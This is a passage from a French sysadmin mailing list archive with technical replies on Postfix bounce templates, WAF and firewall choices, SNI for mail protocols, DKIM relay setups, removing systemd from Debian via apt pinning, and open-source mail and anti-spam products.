utilisatrice qui s’attendrait, comme avec la Poste, à recevoir un message en 
retour dont le contenu soit clair.
Entre la langue (généralement l’anglais) et la structure même du mail (qui se 
borne généralement à copier la réponse SMTP du serveur distant), c’est loin 
d’être le cas actuellement, donc elle m’a appelé au secours.

Est-ce que vous savez s’il y a un projet/effort en cours pour permettre de 
renvoyer des mailer-daemon intelligibles (dans la langue de l’expéditeur donc 
si possible) et dont le contenu soit mis en évidence ?



Effectivement, par défaut, c'est en anglais, et très technique.

Postfix permet de modifier les valeurs par défaut, en éditant les 
templates :

bounce_template_file = /etc/postfix/bounce.cf

Avec dans ce fichier, plusieurs templates (failure, delay, ...)

/etc/postfix/bounce.cf
==
#
# The failure template is used when mail is returned to the sender;
# either the destination rejected the message, or the destination
# could not be reached before the message expired in the queue.
#

failure_template =

Re: [FRsAG] Lisibilité des mailer-daemon

2017-06-09 Thread Guillaume Tournat 
Oui mais comme la langue de la diplomatie, on peut imposer un seul message 
d'explication en français. On a le droit d'être chauvin ;-)

De toute façon, apres, il y a la transaction smtp qui elle reste en anglais. 


> Le 9 juin 2017 à 10:08, Xavier Beaudouin  a écrit :
> 
> Hello,
> 
>> excusez-moi, je n’ai pas de postfix sous la main pour essayer.
>> Il fait quoi le template ?
> 
> Si mes souvenirs sont bon, il remplace le message.
> 
>> Il ne fait que se mettre au début de la réponse de mailer-daemon ?
>> Si oui, si la vrai cause de l’échec est toujours dans la réponse du serveur
>> distant, avec le format inintelligible qui pose problème.
>> Je pensais à un vrai truc qui traduise la réponse d’origine en langage clair
>> (qui à laisser la réponse d’origine en pièce jointe pour le debugging pour 
>> les
>> postmaster).
> 
> Par contre si ton serveur Postfix est public, ne pas oublier de mettre une 
> version anglaise derrière car 0.0.0.0/0 ne dispose pas que des gens qui 
> lisent l'anglais.
> 
> :)
> 
> /Xavier
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] WAF or not WAF ?

2017-06-19 Thread Guillaume Tournat 

Le 19/06/2017 à 12:37, l...@lifo.fr a écrit :

Hello la liste,
Un de mes clients me demande (m’impose ?) (à plus ou moins juste 
titre) la mise en place d’un WAF.
En soit, cela ne me traumatise pas, mais la question sous-jacente est 
de savoir si je fais investir sur la société un WAF hardware pour la 
globalité de l’infra, ou si je pose du WAF-OnDemand sur les 
serveurs/services en fonction des demandes.
Dans le second cas, j’ai déjà utilisé naxsi qui est plutôt assez 
efficace, même si certaines configurations sont semble-t-il assez 
barbares à comprendre/mettre en place.
Par contre, dans le cas d’un WAF matériel, je n’ai absolument aucune 
idée de quoi regarder comme constructeur/plateforme et autres.

Quels sont vos conseils et retour d’expérience en la matière ?
Bien à vous en ce beau lundi où les clims tournent à plein régime !


Bonjour,

J'utilise régulièrement la solution FortiWeb, de Fortinet, qui existe en 
format VM ou hardware appliance.

https://www.fortinet.com/products/web-application-firewall/fortiweb.html

Intègre des fonctionnalités intéressantes :
- IPS web
- antivirus / sandboxing
- anti defacement
- vulnerability scan
- authentication offload

et les traditionnels : url rewrite, ssl offload, tls, http/2


gu!llaume
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Cisco FPR2130 BUN vs Fortigate600D

2017-11-23 Thread Guillaume Tournat 

Bonjour,

Les performances sont bien différentes : throughput, sessions/sec, 
sessions max


Le FortiGate a deux ports 10Gbps.


CISCO


FORTIGATE



Le 22/11/2017 à 05:53, LEMAIRE Philippe a écrit :

Bonjour,
Notre lycée va bientôt intégrer un nouveau bâtiment et je dois trancher 
rapidement entre 2 propositions pour le firewall :
   - Cisco FPR2130 BUN (avec modules)
   - Fortigate600D
Pour info :
   - Toute l'infrastructure network et wifi sera vraisemblablement en Cisco.
   - Backbone 10Go fo
Je suis preneur de tout avis et conseil pour m'aider dans ce choix ... :c)
Merci d'avance
Philippe

___
Liste de diffusion du FRsAG
http://www.frsag.org/


___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] SSL / SNI sur IMAP/POP/SMTP

2017-12-06 Thread Guillaume Tournat 

nginx est un serveur http, à la base...

Fortinet a un load balancer (FortiADC) qui fait du SSL offload et 
supporte SNI.


Ca existe au format virtuel.


my 2 cents


Le 06/12/2017 à 17:04, Julien Escario a écrit :

Bonjour la liste,
Nous sommes en train de 'rêver' à un joli reverse proxy pour les connexions
IMAP, POP (hum) et SMTP avec du ssl offloading et toussa.

L'idéal serait que l'on puisse écouter sur (par exemple), le port 993 pour
imap.domaine1.com, imap.domaine2.com, etc ...
Le tout en présentant un certificat valide pour chaque domaine et ça, s'appelle
SNI (RFC 6066 section 3). C'est une extension TLS donc indépendant du protocole.

Je prends les devants : nous ne souhaitons pas avec un gros certificat qui
comprenne tous les vhosts.

SNI donc, on le fait déjà massivement en HTTP over SSL (aka HTTPS), tous les
browser modernes le supportent.

Le soucis c'est déjà que l'on s'y est pris avec Nginx et ca semble pas vraiment
supporté : impossible de déclarer deux vhosts qui écoutent sur le port 993, ca
gère un conflit :
nginx: [emerg] duplicate "993" address and port pair

Nginx tout frais : nginx version: nginx/1.13.6

Aucune doc là dessus chez Nginx, du coup la question : est-ce que quelqu'un a
une trace d'un tel hack avec Nginx ? Quitte à regarder du côté d'un module
'custom' qu'on veut bien compiler, tester de debugger.

Sinon, Haproxy semble le faire et on investira le temps nécessaire à
l'apprentissage.

Mais, question subsidiaire : je ne trouve aucune liste du support SNI par les
clients IMAP ou SMTP ? C'est si exotique ce que l'on veut faire ?
OK, il y a : https://wiki.dovecot.org/SSL/SNIClientSupport pour avoir une idée
du support en IMAP.

Est-ce que quelqu'un s'est déjà lancé dans ça ? Avec du succès ou pas ?

Merci d'avance !
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/


___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] retour expérience solutions Prim'X Cryhod et ZoneCentral

2020-03-13 Thread Guillaume Tournat via FRsAG 
Solution française choisie par l’Anssi :

https://www.lesechos.fr/2016/03/primx-sinfiltre-dans-les-reseaux-de-letat-213751

Apprécié par d’autres :

https://www.synetis.com/pour-synetis-les-solutions-de-chiffrement-de-primx-sont-gage-de-qualite-et-de-securite/

Leur site :

https://www.primx.eu/fr/a-propos-primx/



> Le 13 mars 2020 à 17:20, Maxime DERCHE  a écrit :
> 
> Bonjour,
> 
> J'ai un client chez qui une feuille de route sécurité est en cours de 
> déroulement, et
> le sujet de la gestion du parc des stations de travail (fixe et laptop) a 
> débouché
> sur des demandes de devis auprès de prestataires dédiés.
> 
> L'un des prestataires contacté a répondu en proposant :
>  * pour le chiffrement des disques des laptops, Prim'X Cryhod ;
>  * pour le NAS chiffré (partage de fichiers, sauvegarde), Prim'X ZoneCentral.
> 
> N'ayant jamais entendu parler de cet éditeur, je serais heureux d'en entendre 
> des
> retours d'expérience. Est-ce un "bon" choix ?
> 
> 
> Bien cordialement,
> -- 
> Maxime DERCHE
> OpenPGP public key ID : 0xAE5264B5
> OpenPGP public key fingerprint : 7221 4C4F D57C 456F 8E40 3257 47F7 29A6 AE52 
> 64B5
> 
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] le télétravail dans l'urgence

2020-03-25 Thread Guillaume Tournat via FRsAG 
oui on peut. il n'y a pas de limite ni licence  (si ce n'est les 
ressources en RAM - environ 50/70Mo par session RDP/HTML5)



Le 25/03/2020 à 14:08, cam.la...@azerttyu.net a écrit :

Hello

Guacamole semble intéressant. Je viens de survoler la doc rapidement
mais je ne suis pas sur de comprendre, peut ton déclarer autant de
postes cibles et les associer à un ou comptes de connexion ?

Km
___
Liste de diffusion du FRsAG
http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Ça marche ?

2020-06-24 Thread Guillaume Tournat via FRsAG 
Ce ne serait pas la mailing list qui provoque ça ?


> Le 25 juin 2020 à 00:21, Olivier Bonvalet  a écrit :
> 
> Hello,
> 
> c'est cassé chez moi !
> 
> Genre :
>> Authentication-Results: daevel.fr (fail); signature_incorrect
> 
> Ou encore :
>> Authentication-Results: gmail.com (fail); signature_incorrect
> 
> 
>> Le dimanche 07 juin 2020 à 02:28 +0200, Jonathan Leroy - Inikup via
>> FRsAG a écrit :
>> Plop,
>> 
>> Apparement la liste était cassée depuis le 14/05 chez les gens qui
>> valident DKIM.
>> Ça va mieux ?
>> 
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Ça marche ?

2020-06-25 Thread Guillaume Tournat via FRsAG 
Effectivement, c'est ce que je fais aussi. Un pool de serveurs relais 
sortants, qui s'occupe des signatures DKIM et des règles de routage si 
besoin.


Tous les serveurs applicatifs/infra ont un petit Postfix en local, qui 
fait "relayhost = relay-out.mondomaine.ext:587"


et quand l'enregistrement n'est pas encadré de [], Postfix sait faire 
une requête MX sur le nom fourni.


Ce qui donne un joli load balancers SMTP vers les relais sortants à pas 
cher :-)



Le 07/06/2020 à 13:46, Julien Escario a écrit :

Le 07/06/2020 à 11:01, Greg a écrit :

Bonjour,

[...]

Je remettrais peut-être DKIM lors de la sortie de Mailman 2.2 ou 2.3.

J'espère ne pas regretter d'avoir été transparent avec vous.
Bon dimanche,
Greg

J'espère bien que non !

My 2 cts : on a renoncé à mettre en place les signatures DKIM sur chaque
SMTP sortant, notamment parce qu'on tombe TOUJOURS sur un MTA qui ne
sait pas le faire. Maintenant, on fait passer par un smarthost qui
contient les clés et fait le boulot de signature avant d'envoyer le mail
vers le destinataire.

Ca fait un étage de plus mais beaucoup d'emmerdes en moins avec une
gestion centralisée des clés.
Et SMTP, c'est plutôt costaud niveau résilience/failover donc si le MTA
de signature se casse la gueule, c'est facile de faire sortir par ailleurs.

Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] deb.sury.org... miroir ou sauvegarde ?

2020-07-18 Thread Guillaume Tournat via FRsAG 

apt-get dist-upgrade ?


Le 18/07/2020 à 19:33, Stéphane Rivière a écrit :

Me suis fait avoir... tous les packages bien à jour pour Jessie (dont
php7.4) viennent d'être supprimés sur deb.sury.org (et tout ce qui
tourne autour, genre php-redis et les bonnes dépendances)...

Personne n'aurait ça dans le coin ? - Oui Jessie c'est vieux mais bon...

TG de Pineau vieux pour les amateurs ;)


___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] deb.sury.org... miroir ou sauvegarde ?

2020-07-18 Thread Guillaume Tournat via FRsAG 

cat /etc/apt/preferences.d/systemd
Package: *systemd*
Pin: release *
Pin-Priority: -1

comme ca, il n'installe pas cette bouse de systemd.


on reste sur un bon vieux sysV des familles :

# dpkg -l|grep sysv
ii  sysv-rc 2.93-8   all  System-V-like 
runlevel change mechanism
ii  sysvinit-core 2.93-8   amd64    
System-V-like init utilities
ii  sysvinit-utils 2.93-8   amd64    
System-V-like utilities



et si on garde des configs propres, ca migre sans souci.


Le 18/07/2020 à 22:02, Stéphane Rivière a écrit :



Le 18/07/2020 à 21:29, Guillaume Tournat a écrit :

apt-get dist-upgrade ?


Plus compliqué que ça...

Depuis quelques version Debian devient vraiment pénible dans ses 
upgrades. Impossible de passer d'une version à l'autre sans tout casser.


systemd, pourquoi pas, on s'y est fait, mais network-systemd, là ça me 
casse les  À moins qu'il y ait un génie pour me dire comment 
transposer pointtopoint de interfaces dans networkd, marre de devoir 
réinventer la roue pour juste rien...


Et je dois faire vivre cette VM encore arf, environ 6 mois...

Et après je repars sur du neuf, même si on a pas mal de choses déjà 
compilées et à jour dessus... Probablement sur du Devuan pour avoir la 
paix de la config :)


systemd a ses bons cotés, mais ça s'occupe de trop de choses 
aujourd'hui, fallait pas toucher au réseau :) On a des setups chiadés 
au niveau hyperviseur Xen (dont on se sert comme routeur local) et pas 
question de changer ce qui marche parfaitement.



___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] deb.sury.org... miroir ou sauvegarde ?

2020-07-19 Thread Guillaume Tournat via FRsAG 
pas besoin de mettre en hold ensuite sysV, le simple fait de mettre 
Pin-Priority:-1 sur systemd interdit son installation.


je nettoie toute install Debian de cette atrocité, sauf par exemple 
quand je monte un hyperviseur Proxmox, où là c'est un prérequis de l'appli.



Le 19/07/2020 à 12:13, Stéphane Rivière a écrit :

Le 19/07/2020 à 00:29, Guillaume Tournat a écrit :

cat /etc/apt/preferences.d/systemd
Package: *systemd*
Pin: release *
Pin-Priority: -1

Je pars d'une install nue systemd Buster par exemple...


comme ca, il n'installe pas cette bouse de systemd.

Je pin tout systemd...
J'installe sysvinit-core
Régénère initramfs et grub et redémarre ?

Puis je mets en hold sysvinit-core pour prévenir toute réinstallation
intempestive de systemd ?

C'est /aussi simple/ que ça ?

Sur une station gnome, je suis bien sûr qu'on aurait quelques /centaines
de paquets désormais dépendants de systemd.

Dans le cas d'un serveur, avec tous les paquets typiques d'un serveur,
on échappe à ces dépendances ?

mmm... shure not ? (C) Idiocracy


on reste sur un bon vieux sysV des familles :

Faut avouer que, pour un serveur dont l'objectif est la fiabilité, donc
la simplicité, systemd n'est pas indispensable.


# dpkg -l|grep sysv
ii  sysv-rc 2.93-8   all  System-V-like
runlevel change mechanism
ii  sysvinit-core 2.93-8   amd64
System-V-like init utilities
ii  sysvinit-utils 2.93-8   amd64
System-V-like utilities


et si on garde des configs propres, ca migre sans souci.

N'ayant pas peur des nouveautés, je m'étais toujours adapté aux
évolutions. Mais ta proposition rejoins ma préoccupation.

J'avais vaguement entendu dire qu'on pouvait (comme le suggérais Gilles)
se passer de networkd, qu'on pouvait aussi virer systemd... et bien
allons y...

Merci pour vos bons conseils !


___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] deb.sury.org... miroir ou sauvegarde ?

2020-07-19 Thread Guillaume Tournat via FRsAG 
Il y a même eu un fork de Debian (nommé Devuan)

Depuis ils ont remis la possibilité de s’en passer dans une Debian mainstream. 

Et je ne m’en prive pas...


> Le 19 juil. 2020 à 16:44, Julien Escario  a écrit :
> 
> Le 18/07/2020 à 22:02, Stéphane Rivière a écrit :
>> 
>> 
>>> Le 18/07/2020 à 21:29, Guillaume Tournat a écrit :
>>> apt-get dist-upgrade ?
>> 
>> Plus compliqué que ça...
>> 
>> Depuis quelques version Debian devient vraiment pénible dans ses
>> upgrades. Impossible de passer d'une version à l'autre sans tout casser.
>> 
>> systemd, pourquoi pas, on s'y est fait, mais network-systemd, là ça me
>> casse les  À moins qu'il y ait un génie pour me dire comment
>> transposer pointtopoint de interfaces dans networkd, marre de devoir
>> réinventer la roue pour juste rien...
> 
> Ah, marrant. Vendredi, j'ai justement remonté un soucis jusqu'à cette
> merde de systemd-networkd sur une VM qui ... perdait l'IPv6 de manière
> intermittente.
> Elle ne pinguait même plus sa gateway pendant des temps de 15 secs à 3/4
> minutes. A priori, networkd faisait merder complètement le NDP.
> 
> Je n'ai pas cherché les détails, j'ai juste tout viré et pouf, nickel
> depuis.
> 
> Donc on a un consensus sur le fait qu'ils sont allé trop loin : network,
> ntp, dns, ...
> 
> Du coup, on se retrouve à mettre en place des astuces pour EVITER
> d'utiliser ce truc, c'est fatiguant.
> 
> Julien
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Cessation d'activité

2020-12-06 Thread Guillaume Tournat via FRsAG 
Bonjour

Ceci peut m’intéresser. Vous pouvez me contacter en privé sur : guillaume (A) 
ironie.fr

Même si je préfère Nginx aujourd’hui à Apache ;-)


> Le 6 déc. 2020 à 11:57, Jonathan Leroy | Inikup via FRsAG  a 
> écrit :
> 
> jonat...@inikup.com

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Cessation d'activité

2020-12-06 Thread Guillaume Tournat via FRsAG 
Bonjour

Ceci peut m’intéresser. Vous pouvez me contacter en privé sur : guillaume (A) 
ironie.fr

Même si je préfère Nginx aujourd’hui à Apache ;-)


> Le 6 déc. 2020 à 11:57, Jonathan Leroy | Inikup via FRsAG  a 
> écrit :
> 
> jonat...@inikup.com

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Cessation d'activité

2020-12-06 Thread Guillaume Tournat via FRsAG 
Bonjour

Ceci peut m’intéresser. Vous pouvez me contacter en privé sur : guillaume (A) 
ironie.fr

Même si je préfère Nginx aujourd’hui à Apache ;-)


> Le 6 déc. 2020 à 11:57, Jonathan Leroy | Inikup via FRsAG  a 
> écrit :
> 
> jonat...@inikup.com

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Recherche prestataire expert en bases de données

2021-09-10 Thread Guillaume Tournat via FRsAG 

Cette boite est spécialisé dans la BDD, et a bonne réputation :

https://www.digora.com/fr


Le 10/09/2021 à 10:37, David Durieux a écrit :

Bonjour à tous,

Je suis à la recherche d'un prestataire qui serait expert en bases de
données pour du N2 & N3.

Les bases de données sont :

* MySQL
* Oracle
* Postgresql
* SQLServer
* autres (4D, filemaker...)

Le but c'est d'être pro-actif et réactif.

Il faudra s'interfacer avec l'outil de supervision en place (il va être
changé, possible que ça soit Zabbix, mais pas encore sûr).


Cela concerne l'administration de ces bases de données, le maintient en
conditions opérationnel, le support... le truc habituel en somme


Je n'ai pas le volume exact, mais les bases de données sont utilisées
par environ 350 serveurs applicatifs.

Si vous avez ça dans votre chapeau ;)

En vous remerciant.


Cordialement,
David Durieux


___
Liste de diffusion du FRsAG
http://www.frsag.org/


___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Exchange like - OpenSource

2021-10-21 Thread Guillaume Tournat via FRsAG 
Zimbra, Open Xchange, BlueMind
pour les plus connus


> Le 21 oct. 2021 à 18:42, HYVERNAT Philippe Responsable Informatique CHAVS 
>  a écrit :
> 
> Bonjour,
> 
> je me permets d'envoyer un message à la communauté car nous avons un projet 
> de refonte de notre messagerie, dans notre établissement.
> 
> En effet, nous possédons plusieurs avec plusieurs solutions différentes, 
> notamment de l'IMAP hébergé chez OVH pour le site A , et de l'Exchange 2010 
> pour le site B.
> 
> Gérant ce projet, j'aimerais savoir s'il existe une solution OpenSource ayant 
> des fonctionnalités similaires à Exchange (annuaire global de contact, 
> partage de calendrier, connexion avec notre Active directory, mail de 
> distribution etc). Les utilisateurs du site B ayant gouté a Exchange ne 
> veulent pas repasser sur une solution moins avancé.
> 
> Merci à vous pour vos retours.
> 
> HYVERNAT Philippe
> 
> Responsable Informatique
> 
> 
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
> 

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Exchange like - OpenSource

2021-10-21 Thread Guillaume Tournat via FRsAG 
En anti spam j’utilise Promox Mail Gateway


> Le 21 oct. 2021 à 19:04, HYVERNAT Philippe Responsable Informatique CHAVS 
>  a écrit :
> 
> 
> Intègre t-elle une solution antispam ou faut il passer par un autre outil, si 
> c'est le cas, connaissez-vous des outils efficaces, opensource également ?
> 
> Merci
> 
> Le 21/10/2021 à 18:55, HYVERNAT Philippe Responsable Informatique CHAVS a 
> écrit :
>> Bonjour,
>> 
>> Merci pour vos réactivités, je ne connaissais pas BlueMind, je vais creuser 
>> un peu plus.
>> 
>> Cordialement,
>> 
>> HYVERNAT Philippe
>> 
>> 
>> 
>> Le 21/10/2021 à 18:53, Rémi CAZENAVE - Le Filament a écrit :
>>> Bonjour Philippe,
>>> 
>>> Tu as Bluemind qui répond à ces critères. L'éditeur est à côté de Toulouse.
>>> 
>>> Ça marche très bien et je crois que c'est quasi les seuls à avoir le 
>>> support Exchange !
>>> 
>>> Si besoin de prestataires pour le mettre en place, Worteks l'a intégré dans 
>>> sa suite W'Sweet hébergée en France et a quelques grands comptes à son 
>>> actif (et des petits comme nous aussi !).
>>> 
>>> Bonne soirée,
>>> Rémi 
>>> SCOP Le Filament
>>> 
>>> Le October 21, 2021 4:40:16 PM UTC, HYVERNAT Philippe Responsable 
>>> Informatique CHAVS  a écrit :
 
 Bonjour,
 
 je me permets d'envoyer un message à la communauté car nous avons un 
 projet de refonte de notre messagerie, dans notre établissement.
 
 En effet, nous possédons plusieurs avec plusieurs solutions différentes, 
 notamment de l'IMAP hébergé chez OVH pour le site A , et de l'Exchange 
 2010 pour le site B.
 
 Gérant ce projet, j'aimerais savoir s'il existe une solution OpenSource 
 ayant des fonctionnalités similaires à Exchange (annuaire global de 
 contact, partage de calendrier, connexion avec notre Active directory, 
 mail de distribution etc). Les utilisateurs du site B ayant gouté a 
 Exchange ne veulent pas repasser sur une solution moins avancé.
 
 Merci à vous pour vos retours.
 
 HYVERNAT Philippe
 
 Responsable Informatique
 Liste de diffusion du FRsAG
 http://www.frsag.org/
>> 
>> 
>> ___
>> Liste de diffusion du FRsAG
>> https://antiphishing.vadesecure.com/1/cGhoeXZlcm5hdEBjaC1hdnMuZnJ8VlJDMTEzODk1Ng%3D%3D/www.frsag.org/
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

[FRsAG] Re: recherche solution relay smtp on premise

2022-08-26 Thread Guillaume Tournat via FRsAG 
Salut

Tout à fait, FortiMail est un bon produit de filtrage mail sécu : spf, dkim, 
antispam, antivirus, DLP, content filter, connectable sandboxing

Disponible hardware ou VM, compatible MSSP


> Le 26 août 2022 à 18:55, Jerome Lien  a écrit :
> 
> 
> Hello,
> 
> Fortimail ? Ça fonctionne, ça fait le trie nécessaire. En gros ça marche sans 
> ce prendre ma tête.
> 
> Jérôme 
> 
> Le ven. 26 août 2022, 14:38, David Ponzone  a écrit :
>> Je me réponds à moi-même, 8 mois après.
>> 
>> Cybonet/Pineapp ont doublé leur prix de licence par rapport à il y a 3 ans.
>> 
>> Je les ai envoyés se faire voir, et j’ai remplacé par Proxmox Mail Gateway, 
>> ça marche très très bien, et c’est très ergonomique, une fois passé les 2 
>> premières heures de prise en main.
>> 
>> Ras le bol de cette cohorte de constructeurs qui profitent de la situation 
>> actuelle pour appliquer une inflation majorée sur leurs tarifs.
>> 
>> > Le 11 janv. 2022 à 15:32, David Ponzone  a écrit :
>> > 
>> > 
>> >> Le 11 janv. 2022 à 14:58, elpablodelcas...@netcourrier.com a écrit :
>> >> 
>> >> PineApp > une idée de la tarification ?
>> >> 
>> > 
>> > Environ 500-600€/an pour 150 utilisateurs, je-sais pas pour les licences 
>> > au-dessus.
>> > Dégressif si tu prends une licence 3 ans bien sûr.
>> > 
>> > 
>> 
>> ___
>> Liste de diffusion du %(real_name)s
>> http://www.frsag.org/
> ___
> Liste de diffusion du %(real_name)s
> http://www.frsag.org/
___
Liste de diffusion du %(real_name)s
http://www.frsag.org/

[FRsAG] Re: recherche solution relay smtp on premise

2022-08-26 Thread Guillaume Tournat via FRsAG 
Je connais PMG et je m’en sers sur des Infras perso/assos

Relai avec un peu d’antispam. Basique mais fonctionnel. 

Je n’appelle pas cela de la sécu par contre. 



> Le 26 août 2022 à 22:33, Mickael Monsieur  a 
> écrit :
> 
> 
> Peut être par ce que c’est exactement ce que David a choisi ? :)
> A raison cela dit en passant … j’en suis ravi également !
> 
>>> Le 26 août 2022 à 22:27, Sebastien Lesimple via FRsAG  a 
>>> écrit :
>>> 
>> Et pourquoi pas un proxmox mail gateway?
>> 
>> 
>> --
>> 
>> De: "Guillaume Tournat via FRsAG" 
>> À: "Jerome Lien"  
>> Envoyé: 2022-08-26 20:24:05 +
>> Objet: [FRsAG] Re: recherche solution relay smtp on premise
>> 
>> Salut
>> 
>> Tout à fait, FortiMail est un bon produit de filtrage mail sécu : spf, dkim, 
>> antispam, antivirus, DLP, content filter, connectable sandboxing
>> 
>> Disponible hardware ou VM, compatible MSSP
>> 
>> 
>>>> Le 26 août 2022 à 18:55, Jerome Lien  a écrit :
>>>> 
>>> 
>>> Hello,
>>> 
>>> Fortimail ? Ça fonctionne, ça fait le trie nécessaire. En gros ça marche 
>>> sans ce prendre ma tête.
>>> 
>>> Jérôme 
>>> 
>>> Le ven. 26 août 2022, 14:38, David Ponzone  a 
>>> écrit :
>>>> Je me réponds à moi-même, 8 mois après.
>>>> 
>>>> Cybonet/Pineapp ont doublé leur prix de licence par rapport à il y a 3 ans.
>>>> 
>>>> Je les ai envoyés se faire voir, et j’ai remplacé par Proxmox Mail 
>>>> Gateway, ça marche très très bien, et c’est très ergonomique, une fois 
>>>> passé les 2 premières heures de prise en main.
>>>> 
>>>> Ras le bol de cette cohorte de constructeurs qui profitent de la situation 
>>>> actuelle pour appliquer une inflation majorée sur leurs tarifs.
>>>> 
>>>> > Le 11 janv. 2022 à 15:32, David Ponzone  a 
>>>> > écrit :
>>>> > 
>>>> > 
>>>> >> Le 11 janv. 2022 à 14:58, elpablodelcas...@netcourrier.com a écrit :
>>>> >> 
>>>> >> PineApp > une idée de la tarification ?
>>>> >> 
>>>> > 
>>>> > Environ 500-600€/an pour 150 utilisateurs, je-sais pas pour les licences 
>>>> > au-dessus.
>>>> > Dégressif si tu prends une licence 3 ans bien sûr.
>>>> > 
>>>> > 
>>>> 
>>>> ___
>>>> Liste de diffusion du %(real_name)s
>>>> http://www.frsag.org/
>>> ___
>>> Liste de diffusion du %(real_name)s
>>> http://www.frsag.org/
>> 
>> 
>> 
>> ___
>> Liste de diffusion du %(real_name)s
>> http://www.frsag.org/___
>> Liste de diffusion du %(real_name)s
>> http://www.frsag.org/
> ___
> Liste de diffusion du %(real_name)s
> http://www.frsag.org/
___
Liste de diffusion du %(real_name)s
http://www.frsag.org/